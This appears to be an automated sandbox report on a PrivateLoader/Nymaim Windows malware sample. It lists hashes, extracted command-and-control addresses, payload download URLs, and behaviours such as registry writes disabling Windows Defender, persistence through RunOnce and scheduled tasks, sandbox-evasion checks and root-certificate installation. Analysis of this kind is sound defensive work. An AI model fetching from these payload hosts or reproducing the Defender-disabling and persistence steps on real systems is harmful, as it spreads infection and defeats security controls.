Analysis
-
max time kernel
160s -
max time network
165s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
17-06-2022 18:38
Static task
static1
Behavioral task
behavioral1
Sample
93e898598b03208eec1d1d11078f5a5c2018e52296013c7a917138a37e88b98d.exe
Resource
win7-20220414-en
General
-
Target
93e898598b03208eec1d1d11078f5a5c2018e52296013c7a917138a37e88b98d.exe
-
Size
461KB
-
MD5
0ec6fdaf9c863feba67424e487c367ea
-
SHA1
54e1b497997d022fb0282edaf20b76480276b99b
-
SHA256
93e898598b03208eec1d1d11078f5a5c2018e52296013c7a917138a37e88b98d
-
SHA512
84161854784db0abcf4e8cd8c7d92b867502cc9a8103656f25cfd8e5725d124cd1130ebcb1d284056dc2dd9de1a5d7474cc00d5615a04733759b786e9ed32807
Malware Config
Extracted
privateloader
http://212.193.30.45/proxies.txt
http://45.144.225.57/server.txt
pastebin.com/raw/A7dSG1te
http://wfsdragon.ru/api/setStats.php
85.202.169.116
http://91.241.19.125/pub.php?pub=one
http://sarfoods.com/index.php
http://212.193.30.29/server.txt
212.193.30.21
-
payload_url
http://193.233.185.125/download/NiceProcessX64.bmp
http://193.233.185.125/download/NiceProcessX32.bmp
https://cdn.discordapp.com/attachments/910842184708792331/931507465563045909/dingo_20220114120058.bmp
https://c.xyzgamec.com/userdown/2202/random.exe
http://193.56.146.76/Proxytest.exe
http://www.yzsyjyjh.com/askhelp23/askinstall23.exe
http://privacy-tools-for-you-780.com/downloads/toolspab3.exe
http://luminati-china.xyz/aman/casper2.exe
https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr95038215.exe
http://tg8.cllgxx.com/hp8/g1/yrpp1047.exe
https://cdn.discordapp.com/attachments/910842184708792331/930849718240698368/Roll.bmp
https://cdn.discordapp.com/attachments/910842184708792331/930850766787330068/real1201.bmp
https://cdn.discordapp.com/attachments/910842184708792331/930882959131693096/Installer.bmp
http://185.215.113.208/ferrari.exe
https://cdn.discordapp.com/attachments/910842184708792331/931233371110141962/LingeringsAntiphon.bmp
https://cdn.discordapp.com/attachments/910842184708792331/931285223709225071/russ.bmp
https://cdn.discordapp.com/attachments/910842184708792331/932720393201016842/filinnn.bmp
https://cdn.discordapp.com/attachments/910842184708792331/933436611427979305/build20k.bmp
https://c.xyzgamec.com/userdown/2202/random.exe
http://mnbuiy.pw/adsli/note8876.exe
http://www.yzsyjyjh.com/askhelp23/askinstall23.exe
http://luminati-china.xyz/aman/casper2.exe
https://suprimax.vet.br/css/fonts/OneCleanerInst942914.exe
http://tg8.cllgxx.com/hp8/g1/ssaa1047.exe
https://www.deezloader.app/files/Deezloader_Remix_Installer_64_bit_4.3.0_Setup.exe
https://www.deezloader.app/files/Deezloader_Remix_Installer_32_bit_4.3.0_Setup.exe
https://cdn.discordapp.com/attachments/910281601559167006/911516400005296219/anyname.exe
https://cdn.discordapp.com/attachments/910281601559167006/911516894660530226/PBsecond.exe
https://cdn.discordapp.com/attachments/910842184708792331/914047763304550410/Xpadder.bmp
Extracted
nymaim
37.0.8.39
31.210.20.149
212.192.241.16
Signatures
-
Processes:
7wVI48VCwJ9w72CizNe2qMzH.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 7wVI48VCwJ9w72CizNe2qMzH.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" 7wVI48VCwJ9w72CizNe2qMzH.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 7wVI48VCwJ9w72CizNe2qMzH.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 7wVI48VCwJ9w72CizNe2qMzH.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 7wVI48VCwJ9w72CizNe2qMzH.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 7wVI48VCwJ9w72CizNe2qMzH.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 7wVI48VCwJ9w72CizNe2qMzH.exe -
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4444 3364 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1060 3364 rundll32.exe -
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
ACProtect 1.3x - 1.4x DLL software 21 IoCs
Detects file using ACProtect software.
Processes:
resource yara_rule C:\Program Files\Common Files\System\symsrv.dll acprotect C:\Program Files\Common Files\System\symsrv.dll acprotect C:\PROGRA~1\COMMON~1\System\symsrv.dll acprotect C:\Program Files\Common Files\System\symsrv.dll acprotect C:\Program Files\Common Files\System\symsrv.dll acprotect C:\Program Files\Common Files\System\symsrv.dll acprotect C:\Program Files\Common Files\System\symsrv.dll acprotect C:\Program Files\Common Files\System\symsrv.dll acprotect C:\Program Files\Common Files\System\symsrv.dll acprotect C:\Program Files\Common Files\System\symsrv.dll acprotect C:\Program Files\Common Files\System\symsrv.dll acprotect C:\Program Files\Common Files\System\symsrv.dll acprotect C:\Program Files\Common Files\System\symsrv.dll acprotect C:\Program Files\Common Files\System\symsrv.dll acprotect C:\Program Files\Common Files\System\symsrv.dll acprotect C:\Program Files\Common Files\System\symsrv.dll acprotect C:\Program Files\Common Files\System\symsrv.dll acprotect C:\Program Files\Common Files\System\symsrv.dll acprotect C:\Program Files\Common Files\System\symsrv.dll acprotect C:\Program Files\Common Files\System\symsrv.dll acprotect C:\Program Files\Common Files\System\symsrv.dll acprotect -
Downloads MZ/PE file
-
Executes dropped EXE 32 IoCs
Processes:
7wVI48VCwJ9w72CizNe2qMzH.exeoRpZT4JOyYYRhdm6Ij1xn9rf.exeNjL9om5oW1wkxRRoKko9Vo4J.exeaOq3NKzzgsc0kr0WmG6Inwu5.exeE1nU3xPJU4n3P2bLkKPbMvMG.exe_6Sd1ObpGBfxX6magicg8HXA.exeGttFQbsjSsnUtS6UR_TTN24W.exeGttFQbsjSsnUtS6UR_TTN24W.exeInstall.exeInstall.exesvchost.exeNostra.exe.pifou3mEGYcRJWtjJmVA3g2DBOG.exeTrdngAnlzr2249.exeliyong.exehandselfdiy_8.exeConhost.exertst1077.exeLzmwAqmV.exesearch_hyperfs_216.exeRoutes Installation.exeanytime6.exeanytime7.exelogger2.exeLzmwAqmV.exeLzmwAqmV.exeF29K3.exeB6LDH.exeNostra.exe.pif1AA09.exeI5CB6KKH3EG1DA9.exepid process 1780 7wVI48VCwJ9w72CizNe2qMzH.exe 2932 oRpZT4JOyYYRhdm6Ij1xn9rf.exe 2600 NjL9om5oW1wkxRRoKko9Vo4J.exe 3632 aOq3NKzzgsc0kr0WmG6Inwu5.exe 2828 E1nU3xPJU4n3P2bLkKPbMvMG.exe 3552 _6Sd1ObpGBfxX6magicg8HXA.exe 3188 GttFQbsjSsnUtS6UR_TTN24W.exe 4800 GttFQbsjSsnUtS6UR_TTN24W.exe 532 Install.exe 2608 Install.exe 4504 svchost.exe 2368 Nostra.exe.pif 2004 ou3mEGYcRJWtjJmVA3g2DBOG.exe 2588 TrdngAnlzr2249.exe 5048 liyong.exe 4892 handselfdiy_8.exe 1900 Conhost.exe 4924 rtst1077.exe 736 LzmwAqmV.exe 2032 search_hyperfs_216.exe 4532 Routes Installation.exe 4968 anytime6.exe 176 anytime7.exe 5072 logger2.exe 4660 LzmwAqmV.exe 736 LzmwAqmV.exe 1272 LzmwAqmV.exe 3744 F29K3.exe 4708 B6LDH.exe 2064 Nostra.exe.pif 1068 1AA09.exe 3576 I5CB6KKH3EG1DA9.exe -
Modifies AppInit DLL entries 2 TTPs
-
Processes:
resource yara_rule C:\Program Files\Common Files\System\symsrv.dll upx behavioral2/memory/3104-131-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral2/memory/3104-132-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral2/memory/3104-140-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral2/memory/1780-141-0x0000000010000000-0x0000000010030000-memory.dmp upx C:\Program Files\Common Files\System\symsrv.dll upx C:\PROGRA~1\COMMON~1\System\symsrv.dll upx behavioral2/memory/1780-144-0x0000000010000000-0x0000000010030000-memory.dmp upx C:\Program Files\Common Files\System\symsrv.dll upx C:\Program Files\Common Files\System\symsrv.dll upx behavioral2/memory/3632-159-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral2/memory/2600-160-0x0000000010000000-0x0000000010030000-memory.dmp upx C:\Program Files\Common Files\System\symsrv.dll upx C:\Program Files\Common Files\System\symsrv.dll upx C:\Program Files\Common Files\System\symsrv.dll upx C:\Program Files\Common Files\System\symsrv.dll upx C:\Program Files\Common Files\System\symsrv.dll upx C:\Program Files\Common Files\System\symsrv.dll upx behavioral2/memory/3552-191-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral2/memory/532-192-0x0000000010000000-0x0000000010030000-memory.dmp upx C:\Program Files\Common Files\System\symsrv.dll upx behavioral2/memory/3188-188-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral2/memory/2828-185-0x0000000010000000-0x0000000010030000-memory.dmp upx C:\Program Files\Common Files\System\symsrv.dll upx C:\Program Files\Common Files\System\symsrv.dll upx behavioral2/memory/4800-204-0x0000000010000000-0x0000000010030000-memory.dmp upx C:\Program Files\Common Files\System\symsrv.dll upx C:\Program Files\Common Files\System\symsrv.dll upx C:\Program Files\Common Files\System\symsrv.dll upx behavioral2/memory/2608-205-0x0000000017190000-0x00000000171C0000-memory.dmp upx behavioral2/memory/5072-222-0x0000000010000000-0x0000000010030000-memory.dmp upx C:\Program Files\Common Files\System\symsrv.dll upx C:\Program Files\Common Files\System\symsrv.dll upx behavioral2/memory/5072-228-0x0000000010000000-0x0000000010030000-memory.dmp upx C:\Program Files\Common Files\System\symsrv.dll upx C:\Program Files\Common Files\System\symsrv.dll upx behavioral2/memory/4800-239-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral2/memory/3552-242-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral2/memory/3988-247-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral2/memory/3808-252-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral2/memory/1536-253-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral2/memory/3988-254-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral2/memory/1536-261-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral2/memory/212-264-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral2/memory/2368-265-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral2/memory/2004-267-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral2/memory/3632-270-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral2/memory/3908-274-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral2/memory/5048-282-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral2/memory/2828-281-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral2/memory/4892-284-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral2/memory/2588-283-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral2/memory/2600-280-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral2/memory/736-289-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral2/memory/1900-295-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral2/memory/532-294-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral2/memory/2608-302-0x0000000017190000-0x00000000171C0000-memory.dmp upx behavioral2/memory/2032-303-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral2/memory/4532-309-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral2/memory/2004-313-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral2/memory/1900-315-0x0000000010000000-0x0000000010030000-memory.dmp upx behavioral2/memory/2728-317-0x0000000010000000-0x0000000010030000-memory.dmp upx -
Processes:
resource yara_rule C:\Users\Admin\Pictures\Adobe Films\QhoCaQiIF04COMyjxVXgK7y6.exe vmprotect C:\Users\Admin\Pictures\Adobe Films\QhoCaQiIF04COMyjxVXgK7y6.exe vmprotect behavioral2/memory/4504-241-0x0000000140000000-0x0000000140678000-memory.dmp vmprotect behavioral2/memory/4924-288-0x0000000140000000-0x0000000140676000-memory.dmp vmprotect -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 11 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
anytime7.exe93e898598b03208eec1d1d11078f5a5c2018e52296013c7a917138a37e88b98d.exe7wVI48VCwJ9w72CizNe2qMzH.exesearch_hyperfs_216.exeanytime6.exeliyong.exelogger2.exeGttFQbsjSsnUtS6UR_TTN24W.exeInstall.exeaOq3NKzzgsc0kr0WmG6Inwu5.exeou3mEGYcRJWtjJmVA3g2DBOG.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation anytime7.exe Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation 93e898598b03208eec1d1d11078f5a5c2018e52296013c7a917138a37e88b98d.exe Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation 7wVI48VCwJ9w72CizNe2qMzH.exe Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation search_hyperfs_216.exe Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation anytime6.exe Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation liyong.exe Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation logger2.exe Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation GttFQbsjSsnUtS6UR_TTN24W.exe Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation aOq3NKzzgsc0kr0WmG6Inwu5.exe Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation ou3mEGYcRJWtjJmVA3g2DBOG.exe -
Loads dropped DLL 64 IoCs
Processes:
93e898598b03208eec1d1d11078f5a5c2018e52296013c7a917138a37e88b98d.exe7wVI48VCwJ9w72CizNe2qMzH.exeaOq3NKzzgsc0kr0WmG6Inwu5.exeNjL9om5oW1wkxRRoKko9Vo4J.exeE1nU3xPJU4n3P2bLkKPbMvMG.exeWerFault.exe_6Sd1ObpGBfxX6magicg8HXA.exeWerFault.exeGttFQbsjSsnUtS6UR_TTN24W.exeGttFQbsjSsnUtS6UR_TTN24W.exeInstall.exeInstall.exelogger2.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exerundll32.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exefindstr.exeWerFault.exeWerFault.exeforfiles.exeforfiles.exeWerFault.exeWerFault.exeNostra.exe.pifWerFault.exeou3mEGYcRJWtjJmVA3g2DBOG.exeWerFault.exeWerFault.exeWerFault.exetaskkill.exeliyong.exeTrdngAnlzr2249.exehandselfdiy_8.exeConhost.exeLzmwAqmV.exesearch_hyperfs_216.exeRoutes Installation.exepid process 3104 93e898598b03208eec1d1d11078f5a5c2018e52296013c7a917138a37e88b98d.exe 1780 7wVI48VCwJ9w72CizNe2qMzH.exe 1780 7wVI48VCwJ9w72CizNe2qMzH.exe 3632 aOq3NKzzgsc0kr0WmG6Inwu5.exe 2600 NjL9om5oW1wkxRRoKko9Vo4J.exe 2828 E1nU3xPJU4n3P2bLkKPbMvMG.exe 4272 WerFault.exe 3552 _6Sd1ObpGBfxX6magicg8HXA.exe 3844 WerFault.exe 3188 GttFQbsjSsnUtS6UR_TTN24W.exe 4800 GttFQbsjSsnUtS6UR_TTN24W.exe 532 Install.exe 2608 Install.exe 2608 Install.exe 2600 NjL9om5oW1wkxRRoKko9Vo4J.exe 2600 NjL9om5oW1wkxRRoKko9Vo4J.exe 2600 NjL9om5oW1wkxRRoKko9Vo4J.exe 2600 NjL9om5oW1wkxRRoKko9Vo4J.exe 2600 NjL9om5oW1wkxRRoKko9Vo4J.exe 2600 NjL9om5oW1wkxRRoKko9Vo4J.exe 5072 logger2.exe 2600 NjL9om5oW1wkxRRoKko9Vo4J.exe 2016 WerFault.exe 2600 NjL9om5oW1wkxRRoKko9Vo4J.exe 2600 NjL9om5oW1wkxRRoKko9Vo4J.exe 2600 NjL9om5oW1wkxRRoKko9Vo4J.exe 5036 WerFault.exe 516 WerFault.exe 3032 WerFault.exe 4452 WerFault.exe 2232 WerFault.exe 4024 WerFault.exe 3988 rundll32.exe 3988 rundll32.exe 3988 rundll32.exe 2012 WerFault.exe 4196 WerFault.exe 1124 WerFault.exe 2340 WerFault.exe 448 WerFault.exe 3808 findstr.exe 4980 WerFault.exe 1344 WerFault.exe 1536 forfiles.exe 212 forfiles.exe 4132 WerFault.exe 2324 WerFault.exe 2368 Nostra.exe.pif 1604 WerFault.exe 2004 ou3mEGYcRJWtjJmVA3g2DBOG.exe 1448 WerFault.exe 3528 WerFault.exe 4364 WerFault.exe 3908 taskkill.exe 5048 liyong.exe 2588 TrdngAnlzr2249.exe 4892 handselfdiy_8.exe 1900 Conhost.exe 736 LzmwAqmV.exe 2032 search_hyperfs_216.exe 4532 Routes Installation.exe 4532 Routes Installation.exe 4532 Routes Installation.exe 4532 Routes Installation.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
NjL9om5oW1wkxRRoKko9Vo4J.exedescription ioc process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce NjL9om5oW1wkxRRoKko9Vo4J.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" NjL9om5oW1wkxRRoKko9Vo4J.exe -
Enumerates connected drives 3 TTPs 3 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
93e898598b03208eec1d1d11078f5a5c2018e52296013c7a917138a37e88b98d.exe7wVI48VCwJ9w72CizNe2qMzH.exeschtasks.exedescription ioc process File opened (read-only) \??\e: 93e898598b03208eec1d1d11078f5a5c2018e52296013c7a917138a37e88b98d.exe File opened (read-only) \??\e: 7wVI48VCwJ9w72CizNe2qMzH.exe File opened (read-only) \??\e: schtasks.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 63 ipinfo.io 140 ip-api.com 30 ipinfo.io 31 ipinfo.io -
Drops file in System32 directory 1 IoCs
Processes:
Install.exedescription ioc process File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
Nostra.exe.pifdescription pid process target process PID 2368 set thread context of 2064 2368 Nostra.exe.pif Nostra.exe.pif -
Drops file in Program Files directory 24 IoCs
Processes:
handselfdiy_8.exe93e898598b03208eec1d1d11078f5a5c2018e52296013c7a917138a37e88b98d.exe7wVI48VCwJ9w72CizNe2qMzH.exeNostra.exe.pifmsiexec.exe1AA09.exedescription ioc process File created C:\Program Files\aieoplapobidheellikiicjfpamacpfd\icon.png handselfdiy_8.exe File created C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\jquery-3.3.1.min.js handselfdiy_8.exe File created C:\Program Files\aieoplapobidheellikiicjfpamacpfd\manifest.json handselfdiy_8.exe File created C:\Program Files\Common Files\System\symsrv.dll 93e898598b03208eec1d1d11078f5a5c2018e52296013c7a917138a37e88b98d.exe File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe 93e898598b03208eec1d1d11078f5a5c2018e52296013c7a917138a37e88b98d.exe File created \??\c:\progra~1\common~1\system\symsrv.dll.000 7wVI48VCwJ9w72CizNe2qMzH.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\tiptsf.dll 7wVI48VCwJ9w72CizNe2qMzH.exe File created C:\Program Files (x86)\Common Files\microsoft shared\ink\tiptsf.dll.tmp Nostra.exe.pif File created C:\Program Files (x86)\Common Files\microsoft shared\ink\tiptsf.dll.tmp msiexec.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\tiptsf.dll.tmp 1AA09.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\tiptsf.dll Nostra.exe.pif File created C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\aes.js handselfdiy_8.exe File created C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\background.js handselfdiy_8.exe File created C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\content.js handselfdiy_8.exe File created C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\pad-nopadding.js handselfdiy_8.exe File created C:\Program Files (x86)\Common Files\microsoft shared\ink\tiptsf.dll.tmp 1AA09.exe File created \??\c:\program files\common files\system\symsrv.dll.000 93e898598b03208eec1d1d11078f5a5c2018e52296013c7a917138a37e88b98d.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe 93e898598b03208eec1d1d11078f5a5c2018e52296013c7a917138a37e88b98d.exe File created C:\Program Files\aieoplapobidheellikiicjfpamacpfd\background.html handselfdiy_8.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\tiptsf.dll msiexec.exe File opened for modification C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\background.js handselfdiy_8.exe File created C:\Program Files (x86)\Common Files\microsoft shared\ink\tiptsf.dll.tmp 7wVI48VCwJ9w72CizNe2qMzH.exe File created C:\Program Files\aieoplapobidheellikiicjfpamacpfd\js\mode-ecb.js handselfdiy_8.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\ink\tiptsf.dll 1AA09.exe -
Drops file in Windows directory 1 IoCs
Processes:
schtasks.exedescription ioc process File created C:\Windows\Tasks\bcyLPxSbowNIYSAEXo.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 17 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 3844 3632 WerFault.exe aOq3NKzzgsc0kr0WmG6Inwu5.exe 5036 3632 WerFault.exe aOq3NKzzgsc0kr0WmG6Inwu5.exe 3032 3632 WerFault.exe aOq3NKzzgsc0kr0WmG6Inwu5.exe 2232 3632 WerFault.exe aOq3NKzzgsc0kr0WmG6Inwu5.exe 2012 3632 WerFault.exe aOq3NKzzgsc0kr0WmG6Inwu5.exe 1124 3988 WerFault.exe rundll32.exe 448 3632 WerFault.exe aOq3NKzzgsc0kr0WmG6Inwu5.exe 2396 4504 WerFault.exe QhoCaQiIF04COMyjxVXgK7y6.exe 1344 3632 WerFault.exe aOq3NKzzgsc0kr0WmG6Inwu5.exe 2324 3632 WerFault.exe aOq3NKzzgsc0kr0WmG6Inwu5.exe 1448 3632 WerFault.exe aOq3NKzzgsc0kr0WmG6Inwu5.exe 4364 3632 WerFault.exe aOq3NKzzgsc0kr0WmG6Inwu5.exe 1744 2588 WerFault.exe TrdngAnlzr2249.exe 2284 4924 WerFault.exe rtst1077.exe 4420 4248 WerFault.exe rundll32.exe 4280 2588 WerFault.exe TrdngAnlzr2249.exe 1780 2588 WerFault.exe TrdngAnlzr2249.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
_6Sd1ObpGBfxX6magicg8HXA.exedescription ioc process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI _6Sd1ObpGBfxX6magicg8HXA.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI _6Sd1ObpGBfxX6magicg8HXA.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI _6Sd1ObpGBfxX6magicg8HXA.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 1700 schtasks.exe 2232 schtasks.exe 4564 schtasks.exe 3320 schtasks.exe -
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
Install.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 3908 taskkill.exe 2728 taskkill.exe -
Processes:
7wVI48VCwJ9w72CizNe2qMzH.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 7wVI48VCwJ9w72CizNe2qMzH.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f6